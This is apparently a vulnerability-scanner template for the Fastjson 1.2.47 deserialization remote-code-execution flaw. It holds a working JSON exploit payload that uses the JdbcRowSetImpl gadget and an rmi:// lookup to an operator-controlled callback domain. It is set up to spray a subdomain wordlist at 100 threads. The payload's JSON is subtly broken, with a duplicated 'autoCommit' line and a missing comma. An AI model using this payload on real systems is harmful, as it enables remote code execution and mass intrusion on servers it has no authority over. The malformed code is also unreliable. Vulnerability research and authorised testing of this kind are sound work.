id: fastjson-1-2-47-rce

info:
  name: Fastjson 1.2.47 Deserialization RCE
  author: zh
  severity: critical
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
    - https://github.com/wyzxxz/fastjson_rce_tool
  tags: fastjson,rce,deserialization,oast

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: application/json

        {
            "a":{
                "@type":"java.lang.Class",
                "val":"com.sun.rowset.JdbcRowSetImpl"
            },
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{Host}}.{{Port}}.{{Subdomains}}.fastjson.{{MY-DOMAIN}}/Exploit",
                "autoCommit":true
                "autoCommit":true
            }
        }